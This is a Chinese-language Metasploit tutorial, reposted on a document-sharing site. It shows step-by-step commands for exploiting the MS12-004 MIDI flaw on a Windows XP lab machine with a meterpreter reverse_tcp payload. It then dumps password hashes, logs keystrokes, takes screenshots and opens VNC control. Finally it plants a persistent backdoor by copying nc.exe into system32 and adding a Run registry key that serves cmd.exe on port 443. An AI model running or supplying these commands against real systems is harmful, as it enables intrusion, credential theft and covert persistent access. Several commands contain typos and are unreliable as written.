《2022年2022年利用Metasploit进行渗透测试》由会员分享,可在线阅读,更多相关《2022年2022年利用Metasploit进行渗透测试(14页珍藏版)》请在金锄头文库上搜索。
1、利用 Metasploit 进行渗透测试声明: 本教程仅限供广大网络安全爱好者交流学习之用,任何人不得用于非法用途,否则后果自负。最近在玩 Backtrack 5 ,就把最近学到的东西分享下。所有工具都是Backtrack 5 自带的,用到的工具: 大名鼎鼎的Metasploit Feamwork 还有Netcat 要利用的漏洞:MS12-004 ,虽然漏洞是几个月前出的了,但这里只做渗透演示,重点在讲解工具的使用方法。废话不说,看步骤:在控制台执行msfconsole 启动 Metasploit ,名师资料总结 - - -精品资料欢迎下载 - - - - - - - - - - - - -
2、- - - - - 名师精心整理 - - - - - - - 第 1 页,共 14 页 - - - - - - - - - 输入命令search ms12_004 ,我们来找找 ms12-004漏洞的利用模块已经找到了,接下来使用该模块输入命令Use exploits/windows/browser/ms12_004_midi 名师资料总结 - - -精品资料欢迎下载 - - - - - - - - - - - - - - - - - - 名师精心整理 - - - - - - - 第 2 页,共 14 页 - - - - - - - - - 接下来输入命令show options ,显示该漏洞
3、的基本信息,以及要设置的参数设置参数:输入命令: set SRVHOST 192.168.42.139 名师资料总结 - - -精品资料欢迎下载 - - - - - - - - - - - - - - - - - - 名师精心整理 - - - - - - - 第 3 页,共 14 页 - - - - - - - - - Set PAYLOAD windows/meterpreter/reverse_tcp Set LHOST 192.168.42.130 Set URIOATH / 最后 再输入 show options ,查看是否设置好已经 OK 了,开始渗透。执行命令:Exploit 名师
4、资料总结 - - -精品资料欢迎下载 - - - - - - - - - - - - - - - - - - 名师精心整理 - - - - - - - 第 4 页,共 14 页 - - - - - - - - - 可以看到服务已经启动了,链接地址http:/192.168.42.130:8080/在用 Xp 打开恶意链接地址http:/192.168.42.130:8080/BackTrack 开始渗透,这边 BT5 已经有反应了,渗透成功 名师资料总结 - - -精品资料欢迎下载 - - - - - - - - - - - - - - - - - - 名师精心整理 - - - - - - -
5、 第 5 页,共 14 页 - - - - - - - - - 输入命令Sessions 我们看到有一个会话,会话的ID 是 1 ,开打开这个会话输入命令Sessions -i 1 这时,我们已经进入了Meterpreter 名师资料总结 - - -精品资料欢迎下载 - - - - - - - - - - - - - - - - - - 名师精心整理 - - - - - - - 第 6 页,共 14 页 - - - - - - - - - Meterpreter 是一个很强大的payload , 具体说明输入help 可以看到,Meterpreter hashdump / 可以看到远程主机帐号
6、和加密后的密码这里再说几个常用的Meterpreter 命令名师资料总结 - - -精品资料欢迎下载 - - - - - - - - - - - - - - - - - - 名师精心整理 - - - - - - - 第 7 页,共 14 页 - - - - - - - - - Meterpreter keyscan_start /开启键盘记录Meterpreter heyscan_dump / 查看键盘记录的内容Meterpreter keyscan_stop / 关闭键盘记录Meterpreter shell /看下图大家都懂的Meterpreter ps / 获取远程主机进程列表, 比 w
7、indows 自带的任务管理器清晰多了名师资料总结 - - -精品资料欢迎下载 - - - - - - - - - - - - - - - - - - 名师精心整理 - - - - - - - 第 8 页,共 14 页 - - - - - - - - - Meterpreter screenshot / 截取远程桌面屏幕Meterpreter run vnc / 开启远程主机 vnc 服务过一会,可以看到桌面,并且可以控制鼠标和键盘名师资料总结 - - -精品资料欢迎下载 - - - - - - - - - - - - - - - - - - 名师精心整理 - - - - - - - 第 9
8、页,共 14 页 - - - - - - - - - 好,下来我们来留后门,方便以后常来 先上传 nc.exe (netcant )到 windows 的 systen32文件夹下Upload /pentest/windows-binaries/tools/nc.exe c:windowssystem32 已经成功了,下来我们将nc.exe加到注册表,让他开机自启动名师资料总结 - - -精品资料欢迎下载 - - - - - - - - - - - - - - - - - - 名师精心整理 - - - - - - - 第 10 页,共 14 页 - - - - - - - - - 先查看注册表
9、Reg enumkey -k HKLMSOFTWAREMiorosoftWindowsCurrentVersionRun 已经可以看到注册表键值了下来加入注册表Reg setval -k HKLMSOFTWAREMiorosoftWindowsCurrentVersionRun -v backdoor -d c:windowssystem32nc.exe-L -d -p 443 cmd.exe (上面是一条命令)名师资料总结 - - -精品资料欢迎下载 - - - - - - - - - - - - - - - - - - 名师精心整理 - - - - - - - 第 11 页,共 14 页
10、- - - - - - - - - 提示成功,看看 XP 的注册表已经有了这个键值我们重启远程主机试下输命令 reboot 名师资料总结 - - -精品资料欢迎下载 - - - - - - - - - - - - - - - - - - 名师精心整理 - - - - - - - 第 12 页,共 14 页 - - - - - - - - - 由于远程主机已经关闭,显示链接断开,等 xp 重启后,我们试试留的后门Telnet 192.168.42.139 443 已经连接成功了: ) .。刚接触 BT5,各位 Fucker 们见笑了. 论坛有玩 B5或者 Metasploit 的基友可以联系我,求交流。QQ :791628659 By Breaker 名师资料总结 - - -精品资料欢迎下载 - - - - - - - - - - - - - - - - - - 名师精心整理 - - - - - - - 第 13 页,共 14 页 - - - - - - - - - 本文地址http:/ 年 4 月 10 日 11:34:16 名师资料总结 - - -精品资料欢迎下载 - - - - - - - - - - - - - - - - - - 名师精心整理 - - - - - - - 第 14 页,共 14 页 - - - - - - - - -
